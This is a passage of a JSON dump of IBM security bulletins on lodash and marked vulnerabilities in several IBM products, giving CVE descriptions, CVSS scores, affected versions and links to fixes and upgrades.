https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-8203](<https://vulners.com/cve/CVE-2020-8203>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution attack. A remote attacker could exploit this vulnerability using the merge, mergeWith, and defaultsDeep functions to inject properties onto Object.prototype to crash the server and possibly execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/183560](<https://exchange.xforce.ibmcloud.com/vulnerabilities/183560>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nEWM| 7.0.2 \nEWM| 7.0.1 \n \n\n\n## Remediation/Fixes\n\n**Upgrade to version 7.0.2 iFix020 or later**\n\n[IBM Engineering Lifecycle Management 7.0.2 iFix020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Lifecycle+Management&release=7.0.2&platform=All&function=all> \"\" )\n\n[IBM Engineering Workflow Management 7.0.2 iFix020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Workflow+Management&release=7.0.2&platform=All&function=all> \"\" )\n\n**Upgrade to version 7.0.1 iFix020 or later**\n\n[IBM Engineering Lifecycle Management 7.0.1 iFix020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Lifecycle+Management&release=7.0.1&platform=All&function=all> \"\" )\n\n[IBM Engineering Workflow Management 7.0.1 iFix020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Workflow+Management&release=7.0.1&platform=All&function=all> \"\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2023-03-27T17:21:35", "type": "ibm", "title": "Security Bulletin: IBM Engineering Workflow Management (EWM) vulnerabilities CVE-2020-28500, CVE-2021-23337, CVE-2020-8203", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2020-8203", "CVE-2021-23337"], "modified": "2023-03-27T17:21:35", "id": "85B7C56E128E085728B9A6C1907216332D70311005E46352CCC818BD2B282D3E", "href": "https://www.ibm.com/support/pages/node/6966416", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:44:58", "description": "## Summary\n\nlodash is used by Tivoli Netcool/OMNIbus WebGUI as part of its web client component. The fix includes lodash v4.17.21.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-1010266](<https://vulners.com/cve/CVE-2019-1010266>) \n** DESCRIPTION: **Lodash is vulnerable to a denial of service, caused by uncontrolled resource consumption in Date handler. By sending an overly long string, a local attacker could exploit this vulnerability to cause the application to stop responding. \nCVSS Base score: 4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168402](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168402>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2018-16487](<https://vulners.com/cve/CVE-2018-16487>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution flaw. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to inject properties onto Object.prototype to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/156530](<https://exchange.xforce.ibmcloud.com/vulnerabilities/156530>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2018-3721](<https://vulners.com/cve/CVE-2018-3721>) \n** DESCRIPTION: **Node.js lodash module could allow a remote attacker to bypass security restrictions, caused by a flaw in the defaultsDeep, 'merge, and mergeWith functions. By modifing the prototype of Object, an attacker could exploit this vulnerability to add or modify existing property that will exist on all objects. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/144603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/144603>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2020-8203](<https://vulners.com/cve/CVE-2020-8203>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution attack. A remote attacker could exploit this vulnerability using the merge, mergeWith, and defaultsDeep functions to inject properties onto Object.prototype to crash the server and possibly execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/183560](<https://exchange.xforce.ibmcloud.com/vulnerabilities/183560>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-10744](<https://vulners.com/cve/CVE-2019-10744>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution flaw. By sending a specially-crafted request using a constructor payload, a remote attacker could exploit this vulnerability to inject properties onto Object.prototype to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/167415](<https://exchange.xforce.ibmcloud.com/vulnerabilities/167415>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Tivoli Netcool/OMNIbus_GUI| 8.1.0 FP26 and earlier \n \n\n\n## Remediation/Fixes\n\n**Product**| **VRMF**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nTivoli Netcool/OMNIbus WebGUI| 8.1.0| IJ40061| Apply Fix Pack 27 ([Fix Pack for WebGUI 8.1.0 Fix Pack 27](<https://www.ibm.com/support/pages/node/6562901> \"Fix Pack for WebGUI 8.1.0 Fix Pack 27\" )) \n \n## Workarounds and Mitigations\n\nUpgrade to WebGUI 8.1.0 Fix Pack 27.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-06-27T03:53:54", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in lodash library affect Tivoli Netcool/OMNIbus WebGUI (CVE-2019-1010266, CVE-2020-28500, CVE-2018-16487, CVE-2018-3721, CVE-2020-8203, CVE-2021-23337, CVE-2019-10744)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-16487", "CVE-2018-3721", "CVE-2019-1010266", "CVE-2019-10744", "CVE-2020-28500", "CVE-2020-8203", "CVE-2021-23337"], "modified": "2022-06-27T03:53:54", "id": "70A9E006601471831C111535E5AEE0524C324100C2852ADCCA9ECFE67BDDCA0D", "href": "https://www.ibm.com/support/pages/node/6598689", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:54:41", "description": "## Summary\n\nIBM API Connect has addressed the following vulnerabilities.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-10744](<https://vulners.com/cve/CVE-2019-10744>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution flaw. By sending a specially-crafted request using a constructor payload, a remote attacker could exploit this vulnerability to inject properties onto Object.prototype to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/167415](<https://exchange.xforce.ibmcloud.com/vulnerabilities/167415>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2020-8203](<https://vulners.com/cve/CVE-2020-8203>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution attack. A remote attacker could exploit this vulnerability using the merge, mergeWith, and defaultsDeep functions to inject properties onto Object.prototype to crash the server and possibly execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/183560](<https://exchange.xforce.ibmcloud.com/vulnerabilities/183560>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2016-10531](<https://vulners.com/cve/CVE-2016-10531>) \n** DESCRIPTION: **Node.js marked module is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the link components. A remote attacker could exploit this vulnerability to inject malicious script into a Web page which would be executed in a victim&amp;#39;s Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim&amp;#39;s cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/149101](<https://exchange.xforce.ibmcloud.com/vulnerabilities/149101>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2017-1000427](<https://vulners.com/cve/CVE-2017-1000427>) \n** DESCRIPTION: **Marked is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the data: URI parser. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim&amp;#39;s Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim&amp;#39;s cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/137243](<https://exchange.xforce.ibmcloud.com/vulnerabilities/137243>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2017-16114](<https://vulners.com/cve/CVE-2017-16114>) \n** DESCRIPTION: **Node.js marked module is vulnerable to regular expression denial of service when passing untrusted user input. A remote attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/135871](<https://exchange.xforce.ibmcloud.com/vulnerabilities/135871>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\n \n\n\nAPI Connect| V10.0.0.0 - V10.0.1.2 \n---|--- \nAPI Connect| V2018.4.1.0-2018.4.1.16 \nAPI Connect| V10.0.1-10.0.2 \n \n\n\n## Remediation/Fixes\n\nAffected Product| Addressed in VRMF| APAR| Remediation/First Fix \n---|---|---|--- \n \nIBM API Connect \n\nV2018.4.1.0-2018.4.1.16\n\n| 2018.4.1.17| LI82297 | \n\nAddressed in IBM API Connect V2018.4.1.17.\n\nDeveloper Portal is impacted.\n\nFollow this link and find the appropriate package. \n\n[http://www.ibm.com/support/fixcentral/swg/quickorder](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=2018.4.1.16&platform=All&function=all&source=fc>) \n \nIBM API Connect \n\nV10.0.0.0-V10.0.1.2\n\n| 10.0.1.4| \n\nLI82297\n\n| \n\nAddressed in IBM API Connect V10.0.1.4\n\nDeveloper Portal is impacted.\n\nFollow this link and find the appropriate package. \n\n \n\n\n[http://www.ibm.com/support/fixcentral/swg/quickorder](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=10.0.1.2&platform=All&function=all&source=fc> \"http://www.ibm.com/support/fixcentral/swg/quickorder\" ) \n \nIBM API Connect\n\n10.0.1-10.0.2\n\n| 10.0.3| \n\nLI82297\n\n| \n\nAddressed in IBM API Connect V10.0.3\n\nDeveloper Portal is impacted.\n\nFollow this link and find the appropriate package. \n\n \n\n\n[http://www.ibm.com/support/fixcentral/swg/quickorder](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=10.0.2.0&platform=All&function=all&source=fc> \"http://www.ibm.com/support/fixcentral/swg/quickorder\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-25T14:41:22", "type": "ibm", "title": "Security Bulletin: IBM API Connect is impacted by multiple vulnerabilities in Drupal dated modernizr library", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10531", "CVE-2017-1000427", "CVE-2017-16114", "CVE-2019-10744", "CVE-2020-28500", "CVE-2020-8203", "CVE-2021-23337"], "modified": "2021-08-25T14:41:22", "id": "0D3AC1653A7CFC61981BECC263BCD833E5441240DF62D2E529CB279D31CBD069", "href": "https://www.ibm.com/support/pages/node/6483681", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:48:17", "description": "## Summary\n\nLodash versions prior to 4.17.21 caused vulnerability in PowerHA System Mirror for AIX releases in service. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nPowerHA SystemMirror | \n\n7.2.1 *\n\n7.2.2 *\n\n7.2.3\n\n7.2.4\n\n7.2.5 \n \n* Versions out of support as on Dec-2021\n\n## Remediation/Fixes\n\nThe service packs of PowerHA 7.2.5 SP1, 7.2.4 SP4 &amp; 7.2.3 SP6 are upgraded to latest version of lodash which remediates this vulnerability. \n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Cluster%20software&amp;product=ibm/Other+software/PowerHAClusterManager&amp;release=7.2.5&amp;platform=AIX&amp;function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Cluster%20software&product=ibm/Other+software/PowerHAClusterManager&release=7.2.5&platform=AIX&function=all>)\n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Cluster%20software&amp;product=ibm/Other+software/PowerHAClusterManager&amp;release=7.2.4&amp;platform=AIX&amp;function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Cluster%20software&product=ibm/Other+software/PowerHAClusterManager&release=7.2.4&platform=AIX&function=all>)\n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Cluster%20software&amp;product=ibm/Other+software/PowerHAClusterManager&amp;release=7.2.3&amp;platform=AIX&amp;function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Cluster%20software&product=ibm/Other+software/PowerHAClusterManager&release=7.2.3&platform=AIX&function=all>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-23T11:04:44", "type": "ibm", "title": "Security Bulletin: Lodash versions prior to 4.17.21 vulnerability in PowerHA System Mirror for AIX", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337"], "modified": "2022-03-23T11:04:44", "id": "EBFB2438D75E8F72CF1C93F67530A33FEEB6EBB40BD3883F85616AFE9252BCE2", "href": "https://www.ibm.com/support/pages/node/6524656", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:36:05", "description": "## Summary\n\nThere is a vulnerability in Node.js lodash that could allow remote execution of arbitrary commands. The code is used by IBM Process Mining. This bulletin identifies the security fixes to apply to address the vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\n**Affected Products/Versions guidance:**\n\n**Affected Product(s)**| **Version(s) \n** \n---|--- \nIBM Process Mining| 1.12.0.3 \n| \n \n## Remediation/Fixes\n\n**Remediation/Fixes guidance**:\n\n**Product(s)**| **Version(s) number and/or range **| **Remediation/Fix/Instructions** \n---|---|--- \nIBM Process Mining| 1.12.0.3| \n\n**Upgrade to version 1.12.0.4** \n \n1.Login to [PassPortAdvantage](<https://www-112.ibm.com/software/howtobuy/passportadvantage/homepage/paocustomer> \"PassPortAdvantage\" ) \n \n2\\. Search for \n**M05JKML** Process Mining 1.12.0.4 Server Multiplatform Multilingual \n \n3\\. Download package\n\n4\\. Follow install instructions \n \n5\\. Repeat for **M05JJML** Process Mining 1.12.0.4 Client Windows Multilingual \n \n| | \n \n## Workarounds and Mitigations\n\n**Workarounds/Mitigation guidance**:\n\nNone known\n\n## ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-01T21:34:50", "type": "ibm", "title": "Security Bulletin: Vulnerability in Node.js lodash affects IBM Process Mining (CVE-2021-23337,CVE-2020-28500)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337"], "modified": "2023-02-01T21:34:50", "id": "354F2A6471BEE4CED51706BB642672B83ADCF320EE2401C7C84197080BA6099F", "href": "https://www.ibm.com/support/pages/node/6574043", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:53:26", "description": "## Summary\n\nThere is vulnerability in lodash which affects IBM VM Recovery Manager DR GUI\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nVMRM DR GUI| V1.5.0.1 and below \n \n\n\n## Remediation/Fixes\n\nSecurity fix is available at the following location: \n\n<https://aix.software.ibm.com/aix/efixes/security/VMRMDR/>\n\nThe security fix contains filesets which should be installed over IBM VM Recovery Manager DR GUI 1.5.0.1\n\nFollowing command can be used to install these filesets:\n\n_installp -ac -FXYd. ksys.ui.agent ksys.ui.server ksys.ui.common_\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-30T06:41:56", "type": "ibm", "title": "Security Bulletin: Vulnerability in lodash affects IBM VM Recovery Manager DR GUI", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": 